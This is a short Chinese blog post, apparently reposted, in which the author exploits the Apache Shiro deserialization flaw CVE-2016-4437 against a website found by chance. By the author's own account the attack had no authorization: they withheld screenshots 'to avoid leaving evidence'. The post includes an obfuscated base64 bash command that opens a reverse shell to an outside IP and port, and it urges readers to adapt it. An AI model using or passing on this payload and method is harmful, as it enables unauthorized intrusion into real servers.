首页 > 其他 > 详细

shiro反序列化(CVE-2016-4437)

时间:2020-06-30 19:14:12      阅读:153      评论:0      收藏:0      [点我收藏+]

偶然发现之前的一个网站,抓包发现cookie中存在remember=deleteme(这里就不截图了,防止留下证据)

手痒难耐,就试试4437这个洞,首先打开你的shiro脚本,使用一条命令

技术分享图片

 

得到回显

技术分享图片

 

 咦,是不是可以直接动手,菜鸟不考虑利用链,直接就使用poc来打就是了

技术分享图片

 

大佬勿喷,隐藏地方为网站:端口号,bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc3LjE0OS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}‘,这里的命令为网上大佬的命令,自行修改,不要做伸手党哦。编码可以使用burp。

直接回车,简简单单弹回shell

技术分享图片

 

 弹回shell。

 

shiro反序列化(CVE-2016-4437)

原文:https://www.cnblogs.com/X-caiji/p/13215124.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!